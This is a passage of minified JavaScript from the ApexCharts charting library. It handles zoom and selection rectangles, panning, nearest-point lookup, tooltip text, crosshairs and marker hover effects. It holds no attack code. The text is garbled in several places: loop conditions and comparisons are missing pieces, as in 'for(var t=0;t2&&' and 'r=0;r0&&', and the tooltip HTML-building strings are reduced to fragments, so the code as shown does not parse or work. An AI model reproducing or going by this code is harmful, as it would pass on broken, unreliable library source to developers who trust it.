0===r?0:r,s=e.translateY,l=void 
0===s?0:s,u=this.w,c=this.zoomRect,d=this.selectionRect;if(this.dragged||null!==u.globals.selection){var h={transform:"translate("+o+", "+l+")"};u.globals.zoomEnabled&&this.dragged&&(i<0&&(i=1),c.attr({x:a,y:n,width:i,height:t,fill:u.config.chart.zoom.zoomedArea.fill.color,"fill-opacity":u.config.chart.zoom.zoomedArea.fill.opacity,stroke:u.config.chart.zoom.zoomedArea.stroke.color,"stroke-width":u.config.chart.zoom.zoomedArea.stroke.width,"stroke-opacity":u.config.chart.zoom.zoomedArea.stroke.opacity}),S.setAttrs(c.node,h)),u.globals.selectionEnabled&&(d.attr({x:a,y:n,width:i>0?i:0,height:t>0?t:0,fill:u.config.chart.selection.fill.color,"fill-opacity":u.config.chart.selection.fill.opacity,stroke:u.config.chart.selection.stroke.color,"stroke-width":u.config.chart.selection.stroke.width,"stroke-dasharray":u.config.chart.selection.stroke.dashArray,"stroke-opacity":u.config.chart.selection.stroke.opacity}),S.setAttrs(d.node,h))}}},{key:"hideSelectionRect",value:function(e){e&&e.attr({x:0,y:0,width:0,height:0})}},{key:"selectionDrawing",value:function(e){var a,n=e.context,i=e.zoomtype,t=this.w,r=n,o=this.gridRect.getBoundingClientRect(),s=r.startX-1,l=r.startY,u=!1,c=!1,d=r.clientX-o.left-s,h=r.clientY-o.top-l;return Math.abs(d+s)>t.globals.gridWidth?d=t.globals.gridWidth-s:r.clientX-o.left<0&&(d=s),s>r.clientX-o.left&&(u=!0,d=Math.abs(d)),l>r.clientY-o.top&&(c=!0,h=Math.abs(h)),a="x"===i?{x:u?s-d:s,y:0,width:d,height:t.globals.gridHeight}:"y"===i?{x:0,y:c?l-h:l,width:t.globals.gridWidth,height:h}:{x:u?s-d:s,y:c?l-h:l,width:d,height:h},r.drawSelectionRect(a),r.selectionDragging("resizing"),a}},{key:"selectionDragging",value:function(e,a){var n=this,i=this.w,t=this.xyRatios,r=this.selectionRect,o=0;"resizing"===e&&(o=30);var s=function(e){return parseFloat(r.node.getAttribute(e))},l={x:s("x"),y:s("y"),width:s("width"),height:s("height")};i.globals.selection=l,"function"==typeof i.config.chart.events.selection&&i.globals.selectionEnabled&&(clearTimeout(this.w.globals.selectionResizeTimer),this.w.globals.selectionResizeTimer=window.setTimeout((function(){var e=n.gridRect.getBoundingClientRect(),a=r.node.getBoundingClientRect(),o={xaxis:{min:i.globals.xAxisScale.niceMin+(a.left-e.left)*t.xRatio,max:i.globals.xAxisScale.niceMin+(a.right-e.left)*t.xRatio},yaxis:{min:i.globals.yAxisScale[0].niceMin+(e.bottom-a.bottom)*t.yRatio[0],max:i.globals.yAxisScale[0].niceMax-(a.top-e.top)*t.yRatio[0]}};i.config.chart.events.selection(n.ctx,o),i.config.chart.brush.enabled&&void 0!==i.config.chart.events.brushScrolled&&i.config.chart.events.brushScrolled(n.ctx,o)}),o))}},{key:"selectionDrawn",value:function(e){var a=e.context,n=e.zoomtype,i=this.w,t=a,r=this.xyRatios,o=this.ctx.toolbar;if(t.startX>t.endX){var s=t.startX;t.startX=t.endX,t.endX=s}if(t.startY>t.endY){var l=t.startY;t.startY=t.endY,t.endY=l}var u=void 0,c=void 0;i.globals.isRangeBar?(u=i.globals.yAxisScale[0].niceMin+t.startX*r.invertedYRatio,c=i.globals.yAxisScale[0].niceMin+t.endX*r.invertedYRatio):(u=i.globals.xAxisScale.niceMin+t.startX*r.xRatio,c=i.globals.xAxisScale.niceMin+t.endX*r.xRatio);var d=[],h=[];if(i.config.yaxis.forEach((function(e,a){d.push(i.globals.yAxisScale[a].niceMax-r.yRatio[a]*t.startY),h.push(i.globals.yAxisScale[a].niceMax-r.yRatio[a]*t.endY)})),t.dragged&&(t.dragX>10||t.dragY>10)&&u!==c)if(i.globals.zoomEnabled){var 
p=k.clone(i.globals.initialConfig.yaxis),m=k.clone(i.globals.initialConfig.xaxis);if(i.globals.zoomed=!0,i.config.xaxis.convertedCatToNumeric&&(u=Math.floor(u),c=Math.floor(c),u<1&&(u=1,c=i.globals.dataPoints),c-u<2&&(c=u+1)),"xy"!==n&&"x"!==n||(m={min:u,max:c}),"xy"!==n&&"y"!==n||p.forEach((function(e,a){p[a].min=h[a],p[a].max=d[a]})),i.config.chart.zoom.autoScaleYaxis){var f=new X(t.ctx);p=f.autoScaleY(t.ctx,p,{xaxis:m})}if(o){var v=o.getBeforeZoomRange(m,p);v&&(m=v.xaxis?v.xaxis:m,p=v.yaxis?v.yaxis:p)}var g={xaxis:m};i.config.chart.group||(g.yaxis=p),t.ctx.updateHelpers._updateOptions(g,!1,t.w.config.chart.animations.dynamicAnimation.enabled),"function"==typeof i.config.chart.events.zoomed&&o.zoomCallback(m,p)}else if(i.globals.selectionEnabled){var b,y=null;b={min:u,max:c},"xy"!==n&&"y"!==n||(y=k.clone(i.config.yaxis)).forEach((function(e,a){y[a].min=h[a],y[a].max=d[a]})),i.globals.selection=t.selection,"function"==typeof i.config.chart.events.selection&&i.config.chart.events.selection(t.ctx,{xaxis:b,yaxis:y})}}},{key:"panDragging",value:function(e){var a=e.context,n=this.w,i=a;if(void 0!==n.globals.lastClientPosition.x){var t=n.globals.lastClientPosition.x-i.clientX,r=n.globals.lastClientPosition.y-i.clientY;Math.abs(t)>Math.abs(r)&&t>0?this.moveDirection="left":Math.abs(t)>Math.abs(r)&&t<0?this.moveDirection="right":Math.abs(r)>Math.abs(t)&&r>0?this.moveDirection="up":Math.abs(r)>Math.abs(t)&&r<0&&(this.moveDirection="down")}n.globals.lastClientPosition={x:i.clientX,y:i.clientY};var o=n.globals.isRangeBar?n.globals.minY:n.globals.minX,s=n.globals.isRangeBar?n.globals.maxY:n.globals.maxX;n.config.xaxis.convertedCatToNumeric||i.panScrolled(o,s)}},{key:"delayedPanScrolled",value:function(){var e=this.w,a=e.globals.minX,n=e.globals.maxX,i=(e.globals.maxX-e.globals.minX)/2;"left"===this.moveDirection?(a=e.globals.minX+i,n=e.globals.maxX+i):"right"===this.moveDirection&&(a=e.globals.minX-i,n=e.globals.maxX-i),a=Math.floor(a),n=Math.floor(n),this.updateScrolledChart({xaxis:{min:a,max:n}},a,n)}},{key:"panScrolled",value:function(e,a){var n=this.w,i=this.xyRatios,t=k.clone(n.globals.initialConfig.yaxis),r=i.xRatio,o=n.globals.minX,s=n.globals.maxX;n.globals.isRangeBar&&(r=i.invertedYRatio,o=n.globals.minY,s=n.globals.maxY),"left"===this.moveDirection?(e=o+n.globals.gridWidth/15*r,a=s+n.globals.gridWidth/15*r):"right"===this.moveDirection&&(e=o-n.globals.gridWidth/15*r,a=s-n.globals.gridWidth/15*r),n.globals.isRangeBar||(e<n.globals.initialMinX||a>n.globals.initialMaxX)&&(e=o,a=s);var l={min:e,max:a};n.config.chart.zoom.autoScaleYaxis&&(t=new X(this.ctx).autoScaleY(this.ctx,t,{xaxis:l}));var u={xaxis:{min:e,max:a}};n.config.chart.group||(u.yaxis=t),this.updateScrolledChart(u,e,a)}},{key:"updateScrolledChart",value:function(e,a,n){var i=this.w;this.ctx.updateHelpers._updateOptions(e,!1,!1),"function"==typeof i.config.chart.events.scrolled&&i.config.chart.events.scrolled(this.ctx,{xaxis:{min:a,max:n}})}}]),n}(),ve=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a,this.ctx=a.ctx}return u(e,[{key:"getNearestValues",value:function(e){var a=e.hoverArea,n=e.elGrid,i=e.clientX,t=e.clientY,r=this.w,o=n.getBoundingClientRect(),s=o.width,l=o.height,u=s/(r.globals.dataPoints-1),c=l/r.globals.dataPoints,d=this.hasBars();!r.globals.comboCharts&&!d||r.config.xaxis.convertedCatToNumeric||(u=s/r.globals.dataPoints);var 
h=i-o.left-r.globals.barPadForNumericAxis,p=t-o.top;h<0||p<0||h>s||p>l?(a.classList.remove("hovering-zoom"),a.classList.remove("hovering-pan")):r.globals.zoomEnabled?(a.classList.remove("hovering-pan"),a.classList.add("hovering-zoom")):r.globals.panEnabled&&(a.classList.remove("hovering-zoom"),a.classList.add("hovering-pan"));var m=Math.round(h/u),f=Math.floor(p/c);d&&!r.config.xaxis.convertedCatToNumeric&&(m=Math.ceil(h/u),m-=1);var v=null,g=null,b=[],y=[];if(r.globals.seriesXvalues.forEach((function(e){b.push([e[0]+1e-6].concat(e))})),r.globals.seriesYvalues.forEach((function(e){y.push([e[0]+1e-6].concat(e))})),b=b.map((function(e){return e.filter((function(e){return k.isNumber(e)}))})),y=y.map((function(e){return e.filter((function(e){return k.isNumber(e)}))})),r.globals.isXNumeric){var x=this.ttCtx.getElGrid().getBoundingClientRect(),S=h*(x.width/s),A=p*(x.height/l);v=(g=this.closestInMultiArray(S,A,b,y)).index,m=g.j,null!==v&&(b=r.globals.seriesXvalues[v],m=(g=this.closestInArray(S,b)).index)}return r.globals.capturedSeriesIndex=null===v?-1:v,(!m||m<1)&&(m=0),r.globals.isBarHorizontal?r.globals.capturedDataPointIndex=f:r.globals.capturedDataPointIndex=m,{capturedSeries:v,j:r.globals.isBarHorizontal?f:m,hoverX:h,hoverY:p}}},{key:"closestInMultiArray",value:function(e,a,n,i){var t=this.w,r=0,o=null,s=-1;t.globals.series.length>1?r=this.getFirstActiveXArray(n):o=0;var l=n[r][0],u=Math.abs(e-l);if(n.forEach((function(a){a.forEach((function(a,n){var i=Math.abs(e-a);i<u&&(u=i,s=n)}))})),-1!==s){var c=i[r][s],d=Math.abs(a-c);o=r,i.forEach((function(e,n){var i=Math.abs(a-e[s]);i<=d&&(d=i,o=n)}))}return{index:o,j:s}}},{key:"getFirstActiveXArray",value:function(e){for(var a=this.w,n=0,i=e.map((function(e,a){return e.length>0?a:-1})),t=0;t<i.length;t++)if(-1!==i[t]&&-1===a.globals.collapsedSeriesIndices.indexOf(t)&&-1===a.globals.ancillaryCollapsedSeriesIndices.indexOf(t)){n=i[t];break}return n}},{key:"closestInArray",value:function(e,a){for(var n=a[0],i=null,t=Math.abs(e-n),r=0;r<a.length;r++){var o=Math.abs(e-a[r]);o<t&&(t=o,i=r)}return{index:i}}},{key:"isXoverlap",value:function(e){var a=[],n=this.w.globals.seriesX.filter((function(e){return void 0!==e[0]}));if(n.length>0)for(var i=0;i<n.length-1;i++)void 0!==n[i][e]&&void 0!==n[i+1][e]&&n[i][e]!==n[i+1][e]&&a.push("inactive");return 0===a.length}},{key:"getElMarkers",value:function(){return this.w.globals.dom.baseEl.querySelectorAll(" .apexcharts-series-markers")}},{key:"hasMarkers",value:function(){return this.getElMarkers().length>0}},{key:"getElBars",value:function(){return this.w.globals.dom.baseEl.querySelectorAll(".apexcharts-bar-series, .apexcharts-candlestick-series, .apexcharts-boxPlot-series, .apexcharts-rangebar-series")}},{key:"hasBars",value:function(){return this.getElBars().length>0}},{key:"getHoverMarkerSize",value:function(e){var a=this.w,n=a.config.markers.hover.size;return void 0===n&&(n=a.globals.markers.size[e]+a.config.markers.hover.sizeOffset),n}},{key:"toggleAllTooltipSeriesGroups",value:function(e){var a=this.w,n=this.ttCtx;0===n.allTooltipSeriesGroups.length&&(n.allTooltipSeriesGroups=a.globals.dom.baseEl.querySelectorAll(".apexcharts-tooltip-series-group"));for(var i=n.allTooltipSeriesGroups,t=0;t ').concat(n.attrs.name,""),a+="
".concat(n.val,"
")})),b.innerHTML=e+"",k.innerHTML=a+""};o?l.globals.seriesGoals[a][n]&&Array.isArray(l.globals.seriesGoals[a][n])?y():(b.innerHTML="",k.innerHTML=""):y()}else b.innerHTML="",k.innerHTML="";null!==m&&(i[a].querySelector(".apexcharts-tooltip-text-z-label").innerHTML=l.config.tooltip.z.title,i[a].querySelector(".apexcharts-tooltip-text-z-value").innerHTML=void 0!==m?m:""),o&&f[0]&&(null==c||l.globals.ancillaryCollapsedSeriesIndices.indexOf(a)>-1||l.globals.collapsedSeriesIndices.indexOf(a)>-1?f[0].parentNode.style.display="none":f[0].parentNode.style.display=l.config.tooltip.items.display)}},{key:"toggleActiveInactiveSeries",value:function(e){var a=this.w;if(e)this.tooltipUtil.toggleAllTooltipSeriesGroups("enable");else{this.tooltipUtil.toggleAllTooltipSeriesGroups("disable");var n=a.globals.dom.baseEl.querySelector(".apexcharts-tooltip-series-group");n&&(n.classList.add("apexcharts-active"),n.style.display=a.config.tooltip.items.display)}}},{key:"getValuesToPrint",value:function(e){var a=e.i,n=e.j,i=this.w,t=this.ctx.series.filteredSeriesX(),r="",o="",s=null,l=null,u={series:i.globals.series,seriesIndex:a,dataPointIndex:n,w:i},c=i.globals.ttZFormatter;null===n?l=i.globals.series[a]:i.globals.isXNumeric&&"treemap"!==i.config.chart.type?(r=t[a][n],0===t[a].length&&(r=t[this.tooltipUtil.getFirstActiveXArray(t)][n])):r=void 0!==i.globals.labels[n]?i.globals.labels[n]:"";var d=r;return r=i.globals.isXNumeric&&"datetime"===i.config.xaxis.type?new J(this.ctx).xLabelFormat(i.globals.ttKeyFormatter,d,d,{i:void 0,dateFormatter:new H(this.ctx).formatDate,w:this.w}):i.globals.isBarHorizontal?i.globals.yLabelFormatters[0](d,u):i.globals.xLabelFormatter(d,u),void 0!==i.config.tooltip.x.formatter&&(r=i.globals.ttKeyFormatter(d,u)),i.globals.seriesZ.length>0&&i.globals.seriesZ[a].length>0&&(s=c(i.globals.seriesZ[a][n],i)),o="function"==typeof i.config.xaxis.tooltip.formatter?i.globals.xaxisTooltipFormatter(d,u):r,{val:Array.isArray(l)?l.join(" "):l,xVal:Array.isArray(r)?r.join(" "):r,xAxisTTVal:Array.isArray(o)?o.join(" "):o,zVal:s}}},{key:"handleCustomTooltip",value:function(e){var a=e.i,n=e.j,i=e.y1,t=e.y2,r=e.w,o=this.ttCtx.getElTooltip(),s=r.config.tooltip.custom;Array.isArray(s)&&s[a]&&(s=s[a]),o.innerHTML=s({ctx:this.ctx,series:r.globals.series,seriesIndex:a,dataPointIndex:n,y1:i,y2:t,w:r})}}]),e}(),be=function(){function e(a){s(this,e),this.ttCtx=a,this.ctx=a.ctx,this.w=a.w}return u(e,[{key:"moveXCrosshairs",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=this.ttCtx,i=this.w,t=n.getElXCrosshairs(),r=e-n.xcrosshairsWidth/2,o=i.globals.labels.slice().length;if(null!==a&&(r=i.globals.gridWidth/o*a),null===t||i.globals.isBarHorizontal||(t.setAttribute("x",r),t.setAttribute("x1",r),t.setAttribute("x2",r),t.setAttribute("y2",i.globals.gridHeight),t.classList.add("apexcharts-active")),r<0&&(r=0),r>i.globals.gridWidth&&(r=i.globals.gridWidth),n.isXAxisTooltipEnabled){var s=r;"tickWidth"!==i.config.xaxis.crosshairs.width&&"barWidth"!==i.config.xaxis.crosshairs.width||(s=r+n.xcrosshairsWidth/2),this.moveXAxisTooltip(s)}}},{key:"moveYCrosshairs",value:function(e){var a=this.ttCtx;null!==a.ycrosshairs&&S.setAttrs(a.ycrosshairs,{y1:e,y2:e}),null!==a.ycrosshairsHidden&&S.setAttrs(a.ycrosshairsHidden,{y1:e,y2:e})}},{key:"moveXAxisTooltip",value:function(e){var a=this.w,n=this.ttCtx;if(null!==n.xaxisTooltip&&0!==n.xcrosshairsWidth){n.xaxisTooltip.classList.add("apexcharts-active");var 
i,t=n.xaxisOffY+a.config.xaxis.tooltip.offsetY+a.globals.translateY+1+a.config.xaxis.offsetY;if(e-=n.xaxisTooltip.getBoundingClientRect().width/2,!isNaN(e))e+=a.globals.translateX,i=new S(this.ctx).getTextRects(n.xaxisTooltipText.innerHTML),n.xaxisTooltipText.style.minWidth=i.width+"px",n.xaxisTooltip.style.left=e+"px",n.xaxisTooltip.style.top=t+"px"}}},{key:"moveYAxisTooltip",value:function(e){var a=this.w,n=this.ttCtx;null===n.yaxisTTEls&&(n.yaxisTTEls=a.globals.dom.baseEl.querySelectorAll(".apexcharts-yaxistooltip"));var i=parseInt(n.ycrosshairsHidden.getAttribute("y1"),10),t=a.globals.translateY+i,r=n.yaxisTTEls[e].getBoundingClientRect().height,o=a.globals.translateYAxisX[e]-2;a.config.yaxis[e].opposite&&(o-=26),t-=r/2,-1===a.globals.ignoreYAxisIndexes.indexOf(e)?(n.yaxisTTEls[e].classList.add("apexcharts-active"),n.yaxisTTEls[e].style.top=t+"px",n.yaxisTTEls[e].style.left=o+a.config.yaxis[e].tooltip.offsetX+"px"):n.yaxisTTEls[e].classList.remove("apexcharts-active")}},{key:"moveTooltip",value:function(e,a){var n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:null,i=this.w,t=this.ttCtx,r=t.getElTooltip(),o=t.tooltipRect,s=null!==n?parseFloat(n):1,l=parseFloat(e)+s+5,u=parseFloat(a)+s/2;if(l>i.globals.gridWidth/2&&(l=l-o.ttWidth-s-10),l>i.globals.gridWidth-o.ttWidth-10&&(l=i.globals.gridWidth-o.ttWidth),l<-20&&(l=-20),i.config.tooltip.followCursor){var c=t.getElGrid(),d=c.getBoundingClientRect();u=t.e.clientY+i.globals.translateY-d.top-o.ttHeight/2}else i.globals.isBarHorizontal||(o.ttHeight/2+u>i.globals.gridHeight&&(u=i.globals.gridHeight-o.ttHeight+i.globals.translateY),u<0&&(u=0));isNaN(l)||(l+=i.globals.translateX,r.style.left=l+"px",r.style.top=u+"px")}},{key:"moveMarkers",value:function(e,a){var n=this.w,i=this.ttCtx;if(n.globals.markers.size[e]>0)for(var t=n.globals.dom.baseEl.querySelectorAll(" .apexcharts-series[data\\:realIndex='".concat(e,"'] .apexcharts-marker")),r=0;r0&&(u.setAttribute("r",s),u.setAttribute("cx",n),u.setAttribute("cy",i)),this.moveXCrosshairs(n),r.fixedTooltip||this.moveTooltip(n,i,s)}}},{key:"moveDynamicPointsOnHover",value:function(e){var a,n=this.ttCtx,i=n.w,t=0,r=0,o=i.globals.pointsArray;a=new K(this.ctx).getActiveConfigSeriesIndex(!0);var s=n.tooltipUtil.getHoverMarkerSize(a);o[a]&&(t=o[a][e][0],r=o[a][e][1]);var l=n.tooltipUtil.getAllMarkers();if(null!==l)for(var u=0;u0?(l[u]&&l[u].setAttribute("r",s),l[u]&&l[u].setAttribute("cy",d)):l[u]&&l[u].setAttribute("r",0)}}if(this.moveXCrosshairs(t),!n.fixedTooltip){var h=r||i.globals.gridHeight;this.moveTooltip(t,h,s)}}},{key:"moveStickyTooltipOverBars",value:function(e){var a=this.w,n=this.ttCtx,i=a.globals.columnSeries?a.globals.columnSeries.length:a.globals.series.length,t=i>=2&&i%2==0?Math.floor(i/2):Math.floor(i/2)+1;a.globals.isBarHorizontal&&(t=new K(this.ctx).getActiveConfigSeriesIndex(!1,"desc")+1);var r=a.globals.dom.baseEl.querySelector(".apexcharts-bar-series .apexcharts-series[rel='".concat(t,"'] path[j='").concat(e,"'], .apexcharts-candlestick-series .apexcharts-series[rel='").concat(t,"'] path[j='").concat(e,"'], .apexcharts-boxPlot-series .apexcharts-series[rel='").concat(t,"'] path[j='").concat(e,"'], .apexcharts-rangebar-series .apexcharts-series[rel='").concat(t,"'] 
path[j='").concat(e,"']")),o=r?parseFloat(r.getAttribute("cx")):0,s=r?parseFloat(r.getAttribute("cy")):0,l=r?parseFloat(r.getAttribute("barWidth")):0,u=r?parseFloat(r.getAttribute("barHeight")):0,c=n.getElGrid().getBoundingClientRect(),d=r.classList.contains("apexcharts-candlestick-area")||r.classList.contains("apexcharts-boxPlot-area");if(a.globals.isXNumeric?(r&&!d&&(o-=i%2!=0?l/2:0),r&&d&&a.globals.comboCharts&&(o-=l/2)):a.globals.isBarHorizontal||(o=n.xAxisTicksPositions[e-1]+n.dataPointsDividedWidth/2,isNaN(o)&&(o=n.xAxisTicksPositions[e]-n.dataPointsDividedWidth/2)),a.globals.isBarHorizontal?(s>a.globals.gridHeight/2&&(s-=n.tooltipRect.ttHeight),(s=s+a.config.grid.padding.top+u/3)+u>a.globals.gridHeight&&(s=a.globals.gridHeight-u)):a.config.tooltip.followCursor?s=n.e.clientY-c.top-n.tooltipRect.ttHeight/2:s+n.tooltipRect.ttHeight+15>a.globals.gridHeight&&(s=a.globals.gridHeight),s<-10&&(s=-10),a.globals.isBarHorizontal||this.moveXCrosshairs(o),!n.fixedTooltip){var h=s||a.globals.gridHeight;this.moveTooltip(o,h)}}}]),e}(),ke=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a,this.ctx=a.ctx,this.tooltipPosition=new be(a)}return u(e,[{key:"drawDynamicPoints",value:function(){var e=this.w,a=new S(this.ctx),n=new z(this.ctx),i=e.globals.dom.baseEl.querySelectorAll(".apexcharts-series");i=v(i),e.config.chart.stacked&&i.sort((function(e,a){return parseFloat(e.getAttribute("data:realIndex"))-parseFloat(a.getAttribute("data:realIndex"))}));for(var t=0;t2&&void 0!==arguments[2]?arguments[2]:null,i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:null,t=this.w;"bubble"!==t.config.chart.type&&this.newPointSize(e,a);var r=a.getAttribute("cx"),o=a.getAttribute("cy");if(null!==n&&null!==i&&(r=n,o=i),this.tooltipPosition.moveXCrosshairs(r),!this.fixedTooltip){if("radar"===t.config.chart.type){var s=this.ttCtx.getElGrid(),l=s.getBoundingClientRect();r=this.ttCtx.e.clientX-l.left}this.tooltipPosition.moveTooltip(r,o,t.config.markers.hover.size)}}},{key:"enlargePoints",value:function(e){for(var a=this.w,n=this,i=this.ttCtx,t=e,r=a.globals.dom.baseEl.querySelectorAll(".apexcharts-series:not(.apexcharts-series-collapsed) .apexcharts-marker"),o=a.config.markers.hover.size,s=0;s=0?e[a].setAttribute("r",n):e[a].setAttribute("r",0)}}}]),e}(),ye=function(){function e(a){s(this,e),this.w=a.w,this.ttCtx=a}return u(e,[{key:"getAttr",value:function(e,a){return parseFloat(e.target.getAttribute(a))}},{key:"handleHeatTreeTooltip",value:function(e){var a=e.e,n=e.opt,i=e.x,t=e.y,r=e.type,o=this.ttCtx,s=this.w;if(a.target.classList.contains("apexcharts-".concat(r,"-rect"))){var l=this.getAttr(a,"i"),u=this.getAttr(a,"j"),c=this.getAttr(a,"cx"),d=this.getAttr(a,"cy"),h=this.getAttr(a,"width"),p=this.getAttr(a,"height");if(o.tooltipLabels.drawSeriesTexts({ttItems:n.ttItems,i:l,j:u,shared:!1,e:a}),s.globals.capturedSeriesIndex=l,s.globals.capturedDataPointIndex=u,i=c+o.tooltipRect.ttWidth/2+h,t=d+o.tooltipRect.ttHeight/2-p/2,o.tooltipPosition.moveXCrosshairs(c+h/2),i>s.globals.gridWidth/2&&(i=c-o.tooltipRect.ttWidth/2+h),o.w.config.tooltip.followCursor){var m=s.globals.dom.elWrap.getBoundingClientRect();i=s.globals.clientX-m.left-(i>s.globals.gridWidth/2?o.tooltipRect.ttWidth:0),t=s.globals.clientY-m.top-(t>s.globals.gridHeight/2?o.tooltipRect.ttHeight:0)}}return{x:i,y:t}}},{key:"handleMarkerTooltip",value:function(e){var a,n,i=e.e,t=e.opt,r=e.x,o=e.y,s=this.w,l=this.ttCtx;if(i.target.classList.contains("apexcharts-marker")){var 
u=parseInt(t.paths.getAttribute("cx"),10),c=parseInt(t.paths.getAttribute("cy"),10),d=parseFloat(t.paths.getAttribute("val"));if(n=parseInt(t.paths.getAttribute("rel"),10),a=parseInt(t.paths.parentNode.parentNode.parentNode.getAttribute("rel"),10)-1,l.intersect){var h=k.findAncestor(t.paths,"apexcharts-series");h&&(a=parseInt(h.getAttribute("data:realIndex"),10))}if(l.tooltipLabels.drawSeriesTexts({ttItems:t.ttItems,i:a,j:n,shared:!l.showOnIntersect&&s.config.tooltip.shared,e:i}),"mouseup"===i.type&&l.markerClick(i,a,n),s.globals.capturedSeriesIndex=a,s.globals.capturedDataPointIndex=n,r=u,o=c+s.globals.translateY-1.4*l.tooltipRect.ttHeight,l.w.config.tooltip.followCursor){var p=l.getElGrid().getBoundingClientRect();o=l.e.clientY+s.globals.translateY-p.top}d<0&&(o=c),l.marker.enlargeCurrentPoint(n,t.paths,r,o)}return{x:r,y:o}}},{key:"handleBarTooltip",value:function(e){var a,n,i=e.e,t=e.opt,r=this.w,o=this.ttCtx,s=o.getElTooltip(),l=0,u=0,c=0,d=this.getBarTooltipXY({e:i,opt:t});a=d.i;var h=d.barHeight,p=d.j;r.globals.capturedSeriesIndex=a,r.globals.capturedDataPointIndex=p,r.globals.isBarHorizontal&&o.tooltipUtil.hasBars()||!r.config.tooltip.shared?(u=d.x,c=d.y,n=Array.isArray(r.config.stroke.width)?r.config.stroke.width[a]:r.config.stroke.width,l=u):r.globals.comboCharts||r.config.tooltip.shared||(l/=2),isNaN(c)?c=r.globals.svgHeight-o.tooltipRect.ttHeight:c<0&&(c=0);var m=parseInt(t.paths.parentNode.getAttribute("data:realIndex"),10),f=r.globals.isMultipleYAxis?r.config.yaxis[m]&&r.config.yaxis[m].reversed:r.config.yaxis[0].reversed;if(u+o.tooltipRect.ttWidth>r.globals.gridWidth&&!f?u-=o.tooltipRect.ttWidth:u<0&&(u=0),o.w.config.tooltip.followCursor){var v=o.getElGrid().getBoundingClientRect();c=o.e.clientY-v.top}null===o.tooltip&&(o.tooltip=r.globals.dom.baseEl.querySelector(".apexcharts-tooltip")),r.config.tooltip.shared||(r.globals.comboBarCount>0?o.tooltipPosition.moveXCrosshairs(l+n/2):o.tooltipPosition.moveXCrosshairs(l)),!o.fixedTooltip&&(!r.config.tooltip.shared||r.globals.isBarHorizontal&&o.tooltipUtil.hasBars())&&(f&&(u-=o.tooltipRect.ttWidth)<0&&(u=0),!f||r.globals.isBarHorizontal&&o.tooltipUtil.hasBars()||(c=c+h-2*(r.globals.series[a][p]<0?h:0)),o.tooltipRect.ttHeight+c>r.globals.gridHeight?c=r.globals.gridHeight-o.tooltipRect.ttHeight+r.globals.translateY:(c=c+r.globals.translateY-o.tooltipRect.ttHeight/2)<0&&(c=0),s.style.left=u+r.globals.translateX+"px",s.style.top=c+"px")}},{key:"getBarTooltipXY",value:function(e){var a=e.e,n=e.opt,i=this.w,t=null,r=this.ttCtx,o=0,s=0,l=0,u=0,c=0,d=a.target.classList;if(d.contains("apexcharts-bar-area")||d.contains("apexcharts-candlestick-area")||d.contains("apexcharts-boxPlot-area")||d.contains("apexcharts-rangebar-area")){var h=a.target,p=h.getBoundingClientRect(),m=n.elGrid.getBoundingClientRect(),f=p.height;c=p.height;var v=p.width,g=parseInt(h.getAttribute("cx"),10),b=parseInt(h.getAttribute("cy"),10);u=parseFloat(h.getAttribute("barWidth"));var k="touchmove"===a.type?a.touches[0].clientX:a.clientX;t=parseInt(h.getAttribute("j"),10),o=parseInt(h.parentNode.getAttribute("rel"),10)-1;var 
y=h.getAttribute("data-range-y1"),x=h.getAttribute("data-range-y2");i.globals.comboCharts&&(o=parseInt(h.parentNode.getAttribute("data:realIndex"),10)),r.tooltipLabels.drawSeriesTexts({ttItems:n.ttItems,i:o,j:t,y1:y?parseInt(y,10):null,y2:x?parseInt(x,10):null,shared:!r.showOnIntersect&&i.config.tooltip.shared,e:a}),i.config.tooltip.followCursor?i.globals.isBarHorizontal?(s=k-m.left+15,l=b-r.dataPointsDividedHeight+f/2-r.tooltipRect.ttHeight/2):(s=i.globals.isXNumeric?g-v/2:g-r.dataPointsDividedWidth+v/2,l=a.clientY-m.top-r.tooltipRect.ttHeight/2-15):i.globals.isBarHorizontal?((s=g)0&&n.setAttribute("width",a.xcrosshairsWidth)}},{key:"handleYCrosshair",value:function(){var e=this.w,a=this.ttCtx;a.ycrosshairs=e.globals.dom.baseEl.querySelector(".apexcharts-ycrosshairs"),a.ycrosshairsHidden=e.globals.dom.baseEl.querySelector(".apexcharts-ycrosshairs-hidden")}},{key:"drawYaxisTooltipText",value:function(e,a,n){var i=this.ttCtx,t=this.w,r=t.globals.yLabelFormatters[e];if(i.yaxisTooltips[e]){var o=i.getElGrid().getBoundingClientRect(),s=(a-o.top)*n.yRatio[e],l=t.globals.maxYArr[e]-t.globals.minYArr[e],u=t.globals.minYArr[e]+(l-s);i.tooltipPosition.moveYCrosshairs(a-o.top),i.yaxisTooltipText[e].innerHTML=r(u),i.tooltipPosition.moveYAxisTooltip(e)}}}]),e}(),Se=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w;var n=this.w;this.tConfig=n.config.tooltip,this.tooltipUtil=new ve(this),this.tooltipLabels=new ge(this),this.tooltipPosition=new be(this),this.marker=new ke(this),this.intersect=new ye(this),this.axesTooltip=new xe(this),this.showOnIntersect=this.tConfig.intersect,this.showTooltipTitle=this.tConfig.x.show,this.fixedTooltip=this.tConfig.fixed.enabled,this.xaxisTooltip=null,this.yaxisTTEls=null,this.isBarShared=!n.globals.isBarHorizontal&&this.tConfig.shared,this.lastHoverTime=Date.now()}return u(e,[{key:"getElTooltip",value:function(e){return e||(e=this),e.w.globals.dom.baseEl?e.w.globals.dom.baseEl.querySelector(".apexcharts-tooltip"):null}},{key:"getElXCrosshairs",value:function(){return this.w.globals.dom.baseEl.querySelector(".apexcharts-xcrosshairs")}},{key:"getElGrid",value:function(){return this.w.globals.dom.baseEl.querySelector(".apexcharts-grid")}},{key:"drawTooltip",value:function(e){var a=this.w;this.xyRatios=e,this.isXAxisTooltipEnabled=a.config.xaxis.tooltip.enabled&&a.globals.axisCharts,this.yaxisTooltips=a.config.yaxis.map((function(e,n){return!!(e.show&&e.tooltip.enabled&&a.globals.axisCharts)})),this.allTooltipSeriesGroups=[],a.globals.axisCharts||(this.showTooltipTitle=!1);var 